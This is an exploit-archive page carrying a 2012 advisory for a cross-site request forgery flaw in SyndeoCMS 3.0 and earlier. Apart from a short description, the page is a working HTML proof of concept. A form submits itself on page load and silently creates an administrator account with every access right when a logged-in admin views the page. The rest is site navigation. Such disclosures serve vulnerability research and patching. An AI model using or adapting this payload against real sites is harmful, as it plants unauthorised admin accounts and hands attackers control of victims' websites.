SyndeoCMS 3.0 Cross Site Request Forgery

SyndeoCMS 3.0 Cross Site Request Forgery: Posted Feb 19, 2012; Authored by Ivano Binetti; SyndeoCMS versions 3.0 and below suffer from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | 2957cb95f3e87834f04f61efa5d810ec4288117f1291ee5d2c4fc993fb3c3a35; Download | Favorite | View

SyndeoCMS 3.0 Cross Site Request Forgery

+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : SyndeoCMS <= 3.0 CSRF Vulnerability
# Date          : 19-02-2012
# Author        : Ivano Binetti (http://ivanobinetti.com)
# Vendor site   : http://www.syndeocms.org/
# Software link : http://sourceforge.net/projects/syndeocms
# Version       : 3.0  and lower 
# Tested on     : Debian Squeeze (6.0) 
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Add Admin Account by Ivano Binetti]--------------------------------------------------+
Summary

1)Introduction
2)Description
3)Exploit

+---------------------------------------------------------------------------------------------------------------------------------+


1)Introduction
The aim of this brief document is to describe a new CSRF vulnerability found into SyndeoCMS 3.0 and lower version and related exploit. 


2)Description
This kind of vulnerability allows an attacker to add an administrator account into SyndeoCMS 3.0 (and lower) when an authenticated admin 
browses a web page containing the following html/javascript code.

3)Exploit 


<html>
<body onload="javascript:document.forms[0].submit()">
<H2>I'm adding ADMIN account</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/syndeocms/starnet/index.php?option=configuration&suboption=users&modoption=save_user&user_id=">
<input type="hidden" name="fullname" value="new_admin"/>
<input type="hidden" name="username" value="new_admin"/>
<input type="hidden" name="password" value="password"/>
<input type="hidden" name="email" value="admin@admin.com"/>
<input type="hidden" name="editor" value="2"/>
<input type="hidden" name="sections" value=""/>
<input type="hidden" name="access_1" value="1"/>
<input type="hidden" name="access_2" value="1"/>
<input type="hidden" name="access_13" value="1"/>
<input type="hidden" name="access_3" value="1"/>
<input type="hidden" name="access_4" value="1"/>
<input type="hidden" name="access_5" value="1"/>
<input type="hidden" name="access_6" value="1"/>
<input type="hidden" name="access_7" value="1"/>
<input type="hidden" name="access_8" value="1"/>
<input type="hidden" name="access_9" value="1"/>
<input type="hidden" name="access_16" value="1"/>
<input type="hidden" name="access_10" value="1"/>
<input type="hidden" name="access_11" value="1"/>
<input type="hidden" name="access_12" value="1"/>
<input type="hidden" name="access_14" value="1"/>
<input type="hidden" name="access_15" value="1"/>
<input type="hidden" name="m_access%5B6%5D" value="1"/>
<input type="hidden" name="m_access%5B8%5D" value="1"/>
<input type="hidden" name="m_access%5B10%5D" value="1"/>
<input type="hidden" name="m_access%5B11%5D" value="1"/>
<input type="hidden" name="m_access%5B0%5D" value="1"/>
<input type="hidden" name="m_access%5B1%5D" value="1"/>
<input type="hidden" name="m_access%5B13%5D" value="1"/>
<input type="hidden" name="m_access%5B12%5D" value="1"/>
<input type="hidden" name="m_access%5B14%5D" value="1"/>
<input type="hidden" name="m_access%5B15%5D" value="1"/>
<input type="hidden" name="m_access%5B7%5D" value="1"/>
<input type="hidden" name="m_access%5B19%5D" value="1"/>
<input type="hidden" name="m_access%5B2%5D" value="1"/>
<input type="hidden" name="m_access%5B16%5D" value="1"/>
<input type="hidden" name="m_access%5B17%5D" value="1"/>
<input type="hidden" name="m_access%5B18%5D" value="1"/>
<input type="hidden" name="m_access%5B3%5D" value="1"/>
<input type="hidden" name="m_access%5B4%5D" value="1"/>
<input type="hidden" name="m_access%5B9%5D" value="1"/>
<input type="hidden" name="m_access%5B5%5D" value="1"/>
</form>
</body>


+----------------------------------------------------------------------------------------------------------------------------------+

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

SyndeoCMS 3.0 Cross Site Request Forgery

SyndeoCMS 3.0 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SyndeoCMS 3.0 Cross Site Request Forgery

Share This

SyndeoCMS 3.0 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems